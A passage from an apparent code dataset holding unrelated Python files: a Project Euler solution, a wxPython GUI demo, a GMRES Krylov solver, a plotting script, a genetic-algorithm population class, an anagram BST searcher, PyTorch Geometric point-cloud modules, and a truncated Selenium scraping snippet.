in range(0, lenS):\n total += int(sqrt[i])\n return total\n\n\ndef solution2():\n decimal.getcontext().prec = 102\n L, d, s = 100, 100, 0\n p = pow(10, d-1)\n\n for z in range(2, L):\n q = decimal.Decimal(z).sqrt()\n s += sum(int(c) for c in str(q * p)[:d]) if q % 1 != 0 else 0\n\n return s\n\n\nif __name__==\"__main__\":\n for f in [solution, solution2]:\n start = timeit.default_timer()\n\n print(f())\n\n stop = timeit.default_timer()\n print(\"Time: \", stop - start, \" s\")","sub_path":"080_square_root_digital_expansion.py","file_name":"080_square_root_digital_expansion.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"153948740","text":"#----------------------------------------------------------------------\n\nilabel = \"horizontal structured mesh definition \"\njlabel = \"vertical structured mesh definition \"\nlabel2 = \"Click here to hide pane\"\n\nbtnlbl1 = \"call Expand(True)\"\nbtnlbl2 = \"call Expand(False)\"\n\nimport wx\n\nclass TestPanel(wx.Panel):\n def __init__(self, parent, log):\n self.log = log\n wx.Panel.__init__(self, parent, -1)\n\n title = wx.StaticText(self, label=\"structured mesh definition\")\n title.SetFont(wx.Font(12, wx.SWISS, wx.NORMAL, wx.BOLD))\n title.SetForegroundColour(\"blue\")\n\n self.cp = cp = wx.CollapsiblePane(self, label=ilabel,\n style=wx.CP_DEFAULT_STYLE|wx.CP_NO_TLW_RESIZE)\n self.Bind(wx.EVT_COLLAPSIBLEPANE_CHANGED, self.OnPaneChanged, cp)\n self.IMeshControl(cp.GetPane())\n\n self.cp2 = cp2 = wx.CollapsiblePane(self, label=jlabel,\n style=wx.CP_DEFAULT_STYLE|wx.CP_NO_TLW_RESIZE)\n self.Bind(wx.EVT_COLLAPSIBLEPANE_CHANGED, self.OnPaneChanged, cp2)\n self.IMeshControl(cp2.GetPane())\n\n sizer = wx.BoxSizer(wx.VERTICAL)\n self.SetSizer(sizer)\n sizer.Add(title, 0, wx.ALL, 30)\n sizer.Add(cp, 0, wx.RIGHT|wx.LEFT|wx.EXPAND, 50)\n pSizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(pSizer, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.LEFT|wx.EXPAND,50)\n sizer.Add((30,40))\n sizer.Add(cp2, 0, wx.RIGHT|wx.LEFT|wx.EXPAND, 50)\n\n def OnPaneChanged(self, cp,evt=None):\n if evt:\n self.log.write('wx.EVT_COLLAPSIBLEPANE_CHANGED: %s' % evt.Collapsed)\n\n # redo the layout\n self.Layout()\n \n\n def IMeshControl(self, pane):\n \n addrSizer = wx.FlexGridSizer(rows = 3,cols=1, hgap=5, vgap=5)\n addrSizer.AddGrowableCol(1)\n# iext = wx.StaticText(pane, -1, 
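Both Project Euler 80 solutions above rely on decimal with 102-digit precision so the first 100 digits survive rounding. A quick sanity check against the example value quoted in the PE 80 statement (the digit sum for sqrt(2) is 475), computed both ways the solutions use:

import decimal

decimal.getcontext().prec = 102
root = decimal.Decimal(2).sqrt()

# Method 1: stringify and strip the decimal point, as in get_digital_sum.
digits = str(root).replace('.', '')[:100]
print(sum(int(ch) for ch in digits))       # 475

# Method 2: scale by 10**99 first, as in solution2; same 100 digits.
scaled = str(root * 10 ** 99)[:100]
print(sum(int(ch) for ch in scaled))       # 475 again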
\"horizontal ext.:\")\n# addrSizer.Add(iext, -1,wx.ALIGN_LEFT|wx.ALIGN_CENTER_VERTICAL)\n \n extSizer = wx.BoxSizer(wx.HORIZONTAL)\n cst0Lbl = wx.StaticText(pane, -1, \"I nb cells/zone:\",size=(150,20))\n extSizer.Add(cst0Lbl, -1,wx.ALIGN_LEFT|wx.ALIGN_CENTER_VERTICAL)\n self.i1 = i1 = wx.TextCtrl(pane, -1, \"1\", size=(50,-1));extSizer.Add(i1, 0, wx.ALIGN_LEFT|wx.RIGHT, 1)\n self.i2 = i2 = wx.TextCtrl(pane, -1, \"0\", size=(50,-1));extSizer.Add(i2, 0, wx.LEFT|wx.RIGHT, 1)\n self.i3 = i3 = wx.TextCtrl(pane, -1, \"0\", size=(50,-1));extSizer.Add(i3, 0, wx.LEFT|wx.RIGHT, 1)\n self.i4 = i4 = wx.TextCtrl(pane, -1, \"0\", size=(50,-1));extSizer.Add(i4, 0, wx.LEFT|wx.RIGHT, 1)\n self.i5 = i5 = wx.TextCtrl(pane, -1, \"0\", size=(50,-1));extSizer.Add(i5, 0, wx.LEFT|wx.RIGHT, 1)\n self.i6 = i6 = wx.TextCtrl(pane, -1, \"0\", size=(50,-1));extSizer.Add(i6, 0, wx.LEFT|wx.RIGHT, 1)\n self.i7 = i7 = wx.TextCtrl(pane, -1, \"0\", size=(50,-1));extSizer.Add(i7, 0, wx.LEFT|wx.RIGHT, 1)\n self.i8 = i8 = wx.TextCtrl(pane, -1, \"0\", size=(50,-1));extSizer.Add(i8, 0, wx.LEFT|wx.RIGHT, 1)\n \n addrSizer.Add(extSizer, 0, wx.ALIGN_LEFT|wx.ALL)\n \n cst1Lbl = wx.StaticText(pane, -1, \"I pt distribution coeff.:\",size=(150,20))\n powSizer = wx.BoxSizer(wx.HORIZONTAL)\n powSizer.Add(cst1Lbl, -1,wx.ALIGN_LEFT|wx.ALIGN_CENTER_VERTICAL)\n self.p1 = p1 = wx.TextCtrl(pane, -1, \"1.\", size=(50,-1));powSizer.Add(p1, 0, wx.LEFT|wx.RIGHT, 1)\n self.p2 = p2 = wx.TextCtrl(pane, -1, \"1.\", size=(50,-1));powSizer.Add(p2, 0, wx.LEFT|wx.RIGHT, 1)\n self.p3 = p3 = wx.TextCtrl(pane, -1, \"1.\", size=(50,-1));powSizer.Add(p3, 0, wx.LEFT|wx.RIGHT, 1)\n self.p4 = p4 = wx.TextCtrl(pane, -1, \"1.\", size=(50,-1));powSizer.Add(p4, 0, wx.LEFT|wx.RIGHT, 1)\n self.p5 = p5 = wx.TextCtrl(pane, -1, \"1.\", size=(50,-1));powSizer.Add(p5, 0, wx.LEFT|wx.RIGHT, 1)\n self.p6 = p6 = wx.TextCtrl(pane, -1, \"1.\", size=(50,-1));powSizer.Add(p6, 0, wx.LEFT|wx.RIGHT, 1)\n self.p7 = p7 = wx.TextCtrl(pane, -1, \"1.\", size=(50,-1));powSizer.Add(p7, 0, wx.LEFT|wx.RIGHT, 1)\n self.p8 = p8 = wx.TextCtrl(pane, -1, \"1.\", size=(50,-1));powSizer.Add(p8, 0, wx.LEFT|wx.RIGHT, 1)\n# addrSizer.Add(powSizer, 0, wx.ALIGN_LEFT|wx.ALIGN_CENTER_HORIZONTAL, 5 )\n addrSizer.Add(powSizer, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.LEFT|wx.EXPAND)\n border = wx.BoxSizer()\n border.Add(addrSizer, 1, wx.EXPAND|wx.ALL, 5)\n pane.SetSizer(border)\n \n \n# def _onOk(self, params):\n def _onOk(self):\n pass\n\n#----------------------------------------------------------------------\n\ndef runTest(frame, nb, log):\n win = TestPanel(nb, log)\n return win\n\n#----------------------------------------------------------------------\n\n\n\noverview = \"\"\"\n

wx.CollapsiblePane

\n\nA collapsable panel is a container with an embedded button-like\ncontrol which can be used by the user to collapse or expand the pane's\ncontents.\n\n\n\"\"\"\n\n\n\nif __name__ == '__main__':\n import sys,os\n import run\n run.main(['', os.path.basename(sys.argv[0])] + sys.argv[1:])\n\n\n","sub_path":"Api/toto.py","file_name":"toto.py","file_ext":"py","file_size_in_byte":5110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"17746267","text":"\"\"\"Krylov iterator solver\"\"\"\n\nimport logging\nimport os\n\nimport numpy as np\n\nfrom .model_config import get_region_cnt\nfrom .model_state_base import lin_comb\nfrom .region_scalars import to_ndarray, to_region_scalar_ndarray\nfrom .solver_state import SolverState, action_step_log_wrap\nfrom .utils import class_name, mkdir_exist_okay\n\n\nclass KrylovSolver:\n \"\"\"\n class for applying a Krylov method to approximate the solution of a system of linear\n equations\n\n The specific Krylov method used is Left-Preconditioned GMRES, algorithm 9.4 of\n 'Iterative Methods for Sparse Linear Systems, 2nd Edition', Yousef Saad, available\n at https://www-users.cs.umn.edu/~saad/books.html.\n\n The solver is applied to A x = -fcn, where A is\n comp_jacobian_fcn_state_prod evaluated at iterate.\n\n Assumes x0 = 0.\n \"\"\"\n\n def __init__(self, iterate, workdir, resume, rewind, hist_fname):\n \"\"\"initialize Krylov solver\"\"\"\n logger = logging.getLogger(__name__)\n logger.debug(\n 'KrylovSolver, workdir=\"%s\", resume=\"%r\", rewind=\"%r\", hist_fname=\"%s\"',\n workdir,\n resume,\n rewind,\n hist_fname,\n )\n\n # ensure workdir exists\n mkdir_exist_okay(workdir)\n\n self._workdir = workdir\n self._solver_state = SolverState(\"Krylov\", workdir, resume, rewind)\n\n iterate.gen_precond_jacobian(\n hist_fname,\n precond_fname=self._fname(\"precond\", iteration=0),\n solver_state=self._solver_state,\n )\n\n def _fname(self, quantity, iteration=None):\n \"\"\"construct fname corresponding to particular quantity\"\"\"\n if iteration is None:\n iteration = self._solver_state.get_iteration()\n return os.path.join(self._workdir, \"%s_%02d.nc\" % (quantity, iteration))\n\n def converged(self):\n \"\"\"is solver converged\"\"\"\n return self._solver_state.get_iteration() >= 3\n\n @action_step_log_wrap(step=\"KrylovSolver._solve0\", per_iteration=False)\n # pylint: disable=unused-argument\n def _solve0(self, fcn, solver_state):\n \"\"\"\n steps of solve that are only performed for iteration 0\n This is step 1 of Saad's alogrithm 9.4.\n \"\"\"\n # assume x0 = 0, so r0 = M.inv*(rhs - A*x0) = M.inv*rhs = -M.inv*fcn\n precond_fcn = fcn.apply_precond_jacobian(\n self._fname(\"precond\", 0), self._fname(\"precond_fcn\"), self._solver_state\n )\n beta = precond_fcn.norm()\n caller = class_name(self) + \"._solve0\"\n (-precond_fcn / beta).dump(self._fname(\"basis\"), caller)\n self._solver_state.set_value_saved_state(\"beta_ndarray\", to_ndarray(beta))\n\n def solve(self, res_fname, iterate, fcn):\n \"\"\"apply Krylov method\"\"\"\n logger = logging.getLogger(__name__)\n logger.debug('res_fname=\"%s\"', res_fname)\n\n self._solve0(fcn, solver_state=self._solver_state)\n\n caller = class_name(self) + \".solve\"\n\n while True:\n j_val = self._solver_state.get_iteration()\n h_mat = to_region_scalar_ndarray(\n np.zeros(\n (\n len(iterate.tracer_modules),\n j_val + 2,\n j_val + 1,\n get_region_cnt(),\n )\n )\n )\n if j_val > 0:\n h_mat[:, :-1, :-1] = to_region_scalar_ndarray(\n 
self._solver_state.get_value_saved_state(\"h_mat_ndarray\")\n )\n basis_j = type(iterate)(self._fname(\"basis\"))\n w_raw = iterate.comp_jacobian_fcn_state_prod(\n fcn, basis_j, self._fname(\"w_raw\"), self._solver_state\n )\n w_j = w_raw.apply_precond_jacobian(\n self._fname(\"precond\", 0), self._fname(\"w\"), self._solver_state\n )\n h_mat[:, :-1, -1] = w_j.mod_gram_schmidt(j_val + 1, self._fname, \"basis\")\n h_mat[:, -1, -1] = w_j.norm()\n w_j /= h_mat[:, -1, -1]\n h_mat_ndarray = to_ndarray(h_mat)\n self._solver_state.set_value_saved_state(\"h_mat_ndarray\", h_mat_ndarray)\n\n # solve least-squares minimization problem for each tracer module\n coeff_ndarray = self.comp_krylov_basis_coeffs(h_mat_ndarray)\n iterate.log_vals(\"KrylovCoeff\", coeff_ndarray)\n\n # construct approximate solution\n res = lin_comb(\n type(iterate),\n to_region_scalar_ndarray(coeff_ndarray),\n self._fname,\n \"basis\",\n )\n res.dump(self._fname(\"krylov_res\", j_val), caller)\n\n if self.converged():\n break\n\n self._solver_state.inc_iteration()\n w_j.dump(self._fname(\"basis\"), caller)\n\n return res.dump(res_fname, caller)\n\n def comp_krylov_basis_coeffs(self, h_mat_ndarray):\n \"\"\"solve least-squares minimization problem for each tracer module\"\"\"\n h_shape = h_mat_ndarray.shape\n coeff_ndarray = np.zeros((h_shape[0], h_shape[2], h_shape[3]))\n lstsq_rhs = np.zeros(h_shape[1])\n beta_ndarray = self._solver_state.get_value_saved_state(\"beta_ndarray\")\n for tracer_module_ind in range(h_shape[0]):\n for region_ind in range(h_shape[3]):\n lstsq_rhs[0] = beta_ndarray[tracer_module_ind, region_ind]\n coeff_ndarray[tracer_module_ind, :, region_ind] = np.linalg.lstsq(\n h_mat_ndarray[tracer_module_ind, :, :, region_ind],\n lstsq_rhs,\n rcond=None,\n )[0]\n return coeff_ndarray\n","sub_path":"src/krylov_solver.py","file_name":"krylov_solver.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"57019642","text":"import sys\nsys.path[0] += '/../'\n\nfrom collections import defaultdict\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom Grader.helpers import get_threshold\nfrom experiments.helpers import read_training_data\n\n\nPLOT_COLORS = {'aug-gen': 'lightskyblue', 'base': 'lightcoral', 'baseline': 'grey', 'bach': 'steelblue'}\nPLOT_LABELS = {'aug-gen': 'Aug. 
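comp_krylov_basis_coeffs above solves the small GMRES least-squares problem min_y ||beta*e1 - H_bar y|| independently for each tracer module and region. A toy instance with hand-written numbers (only the shapes are meaningful; the values are made up for illustration):

import numpy as np

# H_bar is the (j+2) x (j+1) upper-Hessenberg matrix built during Arnoldi;
# the right-hand side is beta in the first entry and zeros below it.
beta = 2.0
h_bar = np.array([[3.0, 1.0],
                  [0.5, 2.0],
                  [0.0, 0.4]])        # (j+2, j+1) with j = 1
rhs = np.zeros(h_bar.shape[0])
rhs[0] = beta
coeffs, residual, *_ = np.linalg.lstsq(h_bar, rhs, rcond=None)
print(coeffs)                                 # Krylov basis coefficients y
print(np.linalg.norm(h_bar @ coeffs - rhs))   # GMRES residual norm at this step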
Gen.', 'base': 'Base', 'baseline': 'Baseline'}\n\naug_gen_dir = 'models/aug-gen_06-04_23:10'\nbase_dir = 'models/base_06-02_06:55'\nbaseline_dir = 'models/base_06-03_00:00'\n\ndef main():\n dir_dict = {'aug-gen': aug_gen_dir, 'base': base_dir, 'baseline': baseline_dir}\n plot_median_grade_per_epoch(dir_dict, num_epochs=40)\n\ndef plot_median_grade_per_epoch(dir_dict, num_epochs):\n median_dict = defaultdict(lambda: [0]*num_epochs)\n for model_label, model_path in dir_dict.items():\n data_dict = read_training_data(data_file=f'{model_path}/grades.csv', feature='grade')\n for epoch, grades in data_dict.items():\n if epoch < num_epochs:\n median_dict[model_label][epoch] = np.median(grades)\n\n plt.figure()\n plt.style.use('seaborn-whitegrid')\n fig, ax = plt.subplots()\n ax.grid(False)\n thres = get_threshold(\n data_file='experiments/ablations/reg_pe_no_oe/bach_grades.csv',\n column='grade',\n aggregate='75p',\n )\n plt.axhline(y=thres, dashes=(2,2), label='Lowest Bach\\ngrade threshold', color=PLOT_COLORS['bach'])\n xlim = range(num_epochs)\n for model_label, median_grades in median_dict.items():\n plt.plot(xlim, median_grades[:num_epochs], label=PLOT_LABELS[model_label], color=PLOT_COLORS[model_label])\n plt.title('Median Grade of Generations During Training')\n ax.set_xticks([i+1 for i in xlim])\n ax.set_xticklabels([str(i) for i in xlim])\n for label in ax.get_xaxis().get_ticklabels()[1::2]:\n label.set_visible(False)\n # plt.legend(loc='right')\n handles, labels = ax.get_legend_handles_labels()\n lgd = ax.legend(handles, labels, loc='upper center', bbox_to_anchor=(-0.2,0.5))\n plt.ylabel('Grade')\n plt.xlabel('Epoch')\n plt.savefig('plots/median_grades_per_epoch.png', bbox_inches='tight')\n\n\nif __name__ == '__main__':\n main()","sub_path":"experiments/compare_training.py","file_name":"compare_training.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"470788237","text":"#\n# Population.py\n#\n#\n\nimport copy\nimport math\nfrom operator import attrgetter\nfrom Individual import *\nfrom Worker import *\nfrom multiprocessing import Pool\n\n\nclass Population:\n \"\"\"\n Population\n \"\"\"\n uniprng=None\n crossoverFraction=None\n \n def __init__(self, populationSize):\n \"\"\"\n Population constructor\n \"\"\"\n self.population=[]\n for i in range(populationSize):\n self.population.append(Individual()) \n\n def __len__(self):\n return len(self.population)\n \n def __getitem__(self,key):\n return self.population[key]\n \n def __setitem__(self,key,newValue):\n self.population[key]=newValue\n \n def copy(self):\n return copy.deepcopy(self)\n \n def evaluateFitness(self,pobj):\n states=[ind.x for ind in self.population]\n fitnesses=pobj.map(Worker.evaluateFitnessPool,states)\n for i in range(len(self.population)): self.population[i].fit=fitnesses[i]\n #for individual in self.population: individual.evaluateFitness() \n \n def mutate(self): \n for individual in self.population:\n individual.mutate()\n \n def crossover(self):\n if (self.startCity==0):\n indexList1=list(range(len(self)))\n indexList2=list(range(len(self)))\n else:\n indexList1=list(range(1,len(self)))\n indexList2=list(range(1,len(self)))\n \n self.uniprng.shuffle(indexList1)\n self.uniprng.shuffle(indexList2)\n\n\n if self.crossoverFraction == 1.0: \n for index1,index2 in zip(indexList1,indexList2):\n self[index1].crossover(self[index2])\n else:\n for index1,index2 in zip(indexList1,indexList2):\n rn=self.uniprng.random()\n if rn 
< self.crossoverFraction:\n self[index1].crossover(self[index2]) \n\n \n def conductTournament(self):\n # binary tournament\n indexList1=list(range(len(self)))\n indexList2=list(range(len(self)))\n \n self.uniprng.shuffle(indexList1)\n self.uniprng.shuffle(indexList2)\n \n # do not allow self competition\n for i in range(len(self)):\n if indexList1[i] == indexList2[i]:\n temp=indexList2[i]\n if i == 0:\n indexList2[i]=indexList2[-1]\n indexList2[-1]=temp\n else:\n indexList2[i]=indexList2[i-1]\n indexList2[i-1]=temp\n \n #compete\n newPop=[] \n for index1,index2 in zip(indexList1,indexList2):\n if self[index1].fit < self[index2].fit:\n newPop.append(copy.deepcopy(self[index1]))\n elif self[index1].fit > self[index2].fit:\n newPop.append(copy.deepcopy(self[index2]))\n else:\n rn=self.uniprng.random()\n if rn > 0.5:\n newPop.append(copy.deepcopy(self[index1]))\n else:\n newPop.append(copy.deepcopy(self[index2]))\n \n # overwrite old pop with newPop \n self.population=newPop \n\n\n def combinePops(self,otherPop):\n self.population.extend(otherPop.population)\n\n def truncateSelect(self,newPopSize):\n #sort by fitness\n self.population.sort(key=attrgetter('fit'),reverse=False)\n \n #then truncate the bottom\n self.population=self.population[:newPopSize] \n \n def __str__(self):\n s=''\n for ind in self:\n s+=str(ind) + '\\n'\n return s\n\n\n \n \n","sub_path":"Population.py","file_name":"Population.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"369485710","text":"\"\"\"\nAnagram Searcher\n\nFinds anagrams of given input, based on given strings and files. \n\"\"\"\n\n__author__ = \"Nicholas Chua\"\n__docformat__ = 'reStructuredText'\n__since__ = '28/06/2013'\n__modified__ = '11/06/2020'\n\nfrom binary_search_list_tree import BinarySearchListTree\nimport sys\n\ndef read_from_file(filename: str, my_tree: BinarySearchListTree[str, str]) -> None:\n with open(filename, 'r') as f:\n for line in f:\n line = line.strip()\n if line.isalpha():\n sorted_string = \"\".join(sorted(line.lower()))\n print(\"Inserting:\", line, \"->\", sorted_string)\n # TODO: Add word to my_tree\n my_tree[sorted_string] = line\n else:\n print(\"Error: Input string %s from file %s\" % (line, filename))\n\ndef menu() -> None:\n my_tree = BinarySearchListTree()\n quit_program = False\n options = [\"Prac7 Anagram Tree Menu Options:\",\n \"Read String\",\n \"Read File\",\n \"List\",\n \"Search\",\n \"Anagram\",\n \"Quit\"]\n\n while not quit_program:\n print()\n for i, option in enumerate(options):\n optnum = \"%d. 
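conductTournament above runs a binary tournament by pairing two shuffled index lists, with a repair step to avoid self-competition and a coin flip on ties. A compact standalone version over plain fitness values (lower is better; the self-competition repair is omitted for brevity):

import random

def binary_tournament(fits, seed=42):
    """Pick len(fits) winners by pairing two shuffled index lists (lower fitness wins)."""
    rng = random.Random(seed)
    idx1 = list(range(len(fits)))
    idx2 = list(range(len(fits)))
    rng.shuffle(idx1)
    rng.shuffle(idx2)
    winners = []
    for a, b in zip(idx1, idx2):
        if fits[a] < fits[b]:
            winners.append(a)
        elif fits[b] < fits[a]:
            winners.append(b)
        else:
            winners.append(a if rng.random() > 0.5 else b)  # coin flip on ties
    return winners

print(binary_tournament([5.0, 1.0, 3.0, 4.0]))  # index 1 wins every pairing it appears in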
\" % i if i > 0 else \"\"\n print(optnum, option, sep=\"\")\n\n command = input(\"Please press a number, then : \").strip()\n\n if command == \"1\": # Read string\n input_string = input(\"Please enter a string: \").strip()\n if input_string.isalpha():\n sorted_string = \"\".join(sorted(input_string.lower()))\n print(\"Inserting:\", input_string, \"->\", sorted_string)\n # TODO: Add string to my_tree\n my_tree[sorted_string] = input_string\n else:\n print(\"ERROR: String not alphanumerical or zero length\")\n\n elif command == \"2\": # Read file\n filename = input(\"Filename: \")\n try:\n read_from_file(filename, my_tree)\n except IOError:\n print(\"Error reading from file:\", filename)\n\n elif command == \"3\": # List words in BST\n for anagram in my_tree:\n string = \"\"\n for words in anagram[1]:\n string += str(words)+\", \"\n print(anagram[0]+\" = \"+string)\n print(\"Done!\")\n\n elif command == \"4\": # Search\n input_string = input(\"Search string: \").strip()\n if input_string.isalpha():\n sorted_string = \"\".join(sorted(input_string.lower()))\n print(\"Searching:\", input_string)\n # TODO: Add search code\n try: \n items = my_tree[sorted_string]\n except KeyError:\n print(\"Item could not be found. Returning to menu\")\n else:\n print(\"Item found!\")\n else:\n print(\"Error: please enter a good string\")\n\n elif command == \"5\": # Anagram\n input_string = input(\"Find anagrams of word: \").strip()\n if input_string.isalpha():\n sorted_string = \"\".join(sorted(input_string.lower()))\n print(\"Searching for anagrams of: \"+input_string)\n try:\n anagram_list = my_tree[sorted_string]\n if len(anagram_list) == 1: \n # if list found has only one element, then there must be no other anagrams\n raise KeyError\n except KeyError:\n print(\"No anagram found\")\n else:\n for word in anagram_list:\n if word is not input_string:\n print(word)\n print(\"Done!\")\n else:\n print(\"Error: please enter a good string\")\n\n elif command == \"6\": # Quit\n quit_program = True\n\n else:\n print(\"Human Error: unrecognised command number!\")\n\nif __name__ == '__main__':\n menu()\n","sub_path":"Anagram Finder/anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"477124893","text":"from abc import ABC, abstractmethod\nimport math\nfrom functools import partial\nimport torch\nfrom torch import nn\nfrom torch.nn import Sequential as Seq, Linear as Lin, ReLU, LeakyReLU, BatchNorm1d as BN, Dropout\nfrom torch_geometric.nn import knn_interpolate, fps, radius, global_max_pool, global_mean_pool, knn\nfrom torch_geometric.data import Batch\nfrom torch_geometric.utils import scatter_\nimport models.utils as utils \n\n\ndef copy_from_to(data, batch):\n for key in data.keys:\n if key not in batch.keys:\n setattr(batch, key, getattr(data, key, None))\n\n\ndef MLP(channels, activation=ReLU()):\n return Seq(*[\n Seq(Lin(channels[i - 1], channels[i]), activation, BN(channels[i]))\n for i in range(1, len(channels))\n ])\n\n################## BASE CONVOLUTION #####################\n\n\nclass BaseConvolution(ABC, torch.nn.Module):\n\n def __init__(self, sampler, neighbour_finder, *args, **kwargs):\n torch.nn.Module.__init__(self)\n\n self.sampler = sampler\n self.neighbour_finder = neighbour_finder\n\n\nclass BaseConvolutionDown(BaseConvolution):\n def __init__(self, sampler, neighbour_finder, *args, **kwargs):\n super(BaseConvolutionDown, self).__init__(sampler, neighbour_finder, *args, 
**kwargs)\n\n self._precompute_multi_scale = kwargs.get(\"precompute_multi_scale\", None)\n self._index = kwargs.get(\"index\", None)\n\n def conv(self, x, pos, edge_index, batch):\n raise NotImplementedError\n\n def forward(self, data):\n batch_obj = Batch()\n x, pos, batch = data.x, data.pos, data.batch\n if self._precompute_multi_scale:\n idx = getattr(data, \"idx_{}\".format(self._index), None)\n edge_index = getattr(data, \"edge_index_{}\".format(self._index), None)\n else:\n idx = self.sampler(pos, batch)\n row, col = self.neighbour_finder(pos, pos[idx], batch, batch[idx])\n edge_index = torch.stack([col, row], dim=0)\n batch_obj.idx = idx\n batch_obj.edge_index = edge_index\n\n batch_obj.x = self.conv(x, (pos, pos[idx]), edge_index, batch)\n batch_obj.pos = pos[idx]\n batch_obj.batch = batch[idx]\n copy_from_to(data, batch_obj)\n return batch_obj\n\n\nclass BaseConvolutionUp(BaseConvolution):\n def __init__(self, neighbour_finder, *args, **kwargs):\n super(BaseConvolutionUp, self).__init__(None, neighbour_finder, *args, **kwargs)\n\n self._precompute_multi_scale = kwargs.get(\"precompute_multi_scale\", None)\n self._index = kwargs.get(\"index\", None)\n self._skip = kwargs.get(\"skip\", True)\n\n def conv(self, x, pos, pos_skip, batch, batch_skip, edge_index):\n raise NotImplementedError\n\n def forward(self, data):\n batch_obj = Batch()\n data, data_skip = data\n x, pos, batch = data.x, data.pos, data.batch\n x_skip, pos_skip, batch_skip = data_skip.x, data_skip.pos, data_skip.batch\n\n if self.neighbour_finder is not None:\n if self._precompute_multi_scale: # TODO For now, it uses the one calculated during down steps\n edge_index = getattr(data_skip, \"edge_index_{}\".format(self._index), None)\n col, row = edge_index\n edge_index = torch.stack([row, col], dim=0)\n else:\n row, col = self.neighbour_finder(pos, pos_skip, batch, batch_skip)\n edge_index = torch.stack([col, row], dim=0)\n else:\n edge_index = None\n\n x = self.conv(x, pos, pos_skip, batch, batch_skip, edge_index)\n\n if x_skip is not None and self._skip:\n x = torch.cat([x, x_skip], dim=1)\n if hasattr(self, 'nn'):\n batch_obj.x = self.nn(x)\n else:\n batch_obj.x = x\n copy_from_to(data_skip, batch_obj)\n return batch_obj\n\n\nclass GlobalBaseModule(torch.nn.Module):\n def __init__(self, nn, aggr='max'):\n super(GlobalBaseModule, self).__init__()\n self.nn = MLP(nn)\n self.pool = global_max_pool if aggr == \"max\" else global_mean_pool\n\n def forward(self, data):\n batch_obj = Batch()\n x, pos, batch = data.x, data.pos, data.batch\n x = self.nn(torch.cat([x, pos], dim=1))\n x = self.pool(x, batch)\n batch_obj.x = x\n batch_obj.pos = pos.new_zeros((x.size(0), 3))\n batch_obj.batch = torch.arange(x.size(0), device=batch.device)\n copy_from_to(data, batch_obj)\n return batch_obj\n\n#################### COMMON MODULE ########################\n\n\nclass FPModule(BaseConvolutionUp):\n \"\"\" Upsampling module from PointNet++\n\n Arguments:\n k [int] -- number of nearest neighboors used for the interpolation\n up_conv_nn [List[int]] -- list of feature sizes for the uplconv mlp\n\n Returns:\n [type] -- [description]\n \"\"\"\n\n def __init__(self, up_k, up_conv_nn, nb_feature=None, **kwargs):\n super(FPModule, self).__init__(None)\n\n self.k = up_k\n self.nn = MLP(up_conv_nn)\n\n def conv(self, x, pos, pos_skip, batch, batch_skip, *args):\n return knn_interpolate(x, pos, pos_skip, batch, batch_skip, k=self.k)\n\n########################## BASE RESIDUAL DOWN #####################\n\n\nclass 
BaseResnetBlockDown(BaseConvolutionDown):\n\n def __init__(self, sampler, neighbour_finder, *args, **kwargs):\n super(BaseResnetBlockDown, self).__init__(sampler, neighbour_finder, *args, **kwargs)\n\n in_features, out_features, conv_features = kwargs.get(\"down_conv_nn\", None)\n\n self.in_features = in_features\n self.out_features = out_features\n self.conv_features = conv_features\n\n self.features_downsample_nn = MLP([self.in_features, self.conv_features])\n\n self.features_upsample_nn = MLP([self.conv_features, self.out_features])\n self.shortcut_feature_resize_nn = MLP([self.in_features, self.out_features])\n\n def convs(self, x, pos, edge_index):\n raise NotImplementedError\n\n def conv(self, x, pos, edge_index):\n shortcut = x\n x = self.features_downsample_nn(x)\n x, pos, edge_index, idx = self.convs(x, pos, edge_index)\n x = self.features_upsample_nn(x)\n if idx is not None:\n shortcut = shortcut[idx]\n shortcut = self.shortcut_feature_resize_nn(shortcut)\n x = shortcut + x\n return x\n\n\nclass BaseResnetBlock(ABC, torch.nn.Module):\n\n def __init__(self, indim, outdim, convdim):\n '''\n indim: size of x at the input\n outdim: desired size of x at the output\n convdim: size of x following convolution\n '''\n torch.nn.Module.__init__(self)\n\n self.indim = indim\n self.outdim = outdim\n self.convdim = convdim\n\n self.features_downsample_nn = MLP([self.indim, self.outdim//4])\n self.features_upsample_nn = MLP([self.convdim, self.outdim])\n\n self.shortcut_feature_resize_nn = MLP([self.indim, self.outdim])\n\n self.activation = ReLU()\n\n @property\n @abstractmethod\n def convs(self):\n pass\n\n def forward(self, data):\n batch_obj = Batch()\n x = data.x # (N, indim)\n shortcut = x # (N, indim)\n x = self.features_downsample_nn(x) # (N, outdim//4)\n # if this is an identity resnet block, idx will be None\n data = self.convs(data) # (N', convdim)\n x = data.x\n idx = data.idx\n x = self.features_upsample_nn(x) # (N', outdim)\n if idx is not None:\n shortcut = shortcut[idx] # (N', indim)\n shortcut = self.shortcut_feature_resize_nn(shortcut) # (N', outdim)\n x = shortcut + x\n batch_obj.x = x\n batch_obj.pos = data.pos\n batch_obj.batch = data.batch\n copy_from_to(data, batch_obj)\n return batch_obj\n","sub_path":"models/core_modules.py","file_name":"core_modules.py","file_ext":"py","file_size_in_byte":7798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"410812213","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\n\n\ndriver=webdriver.Chrome()\ndriver.get('https://www.yhd.com')\na=driver.find_elements(By.CLASS_NAME,'bursting')\njs='window.scrollTo(0,1300)'\ndriver.execute_script(js)\nfor i in a :\n if i.get_attribute('clstag')=='pageclick|keycount|shouye_20181018|scenario3_sku4':\n 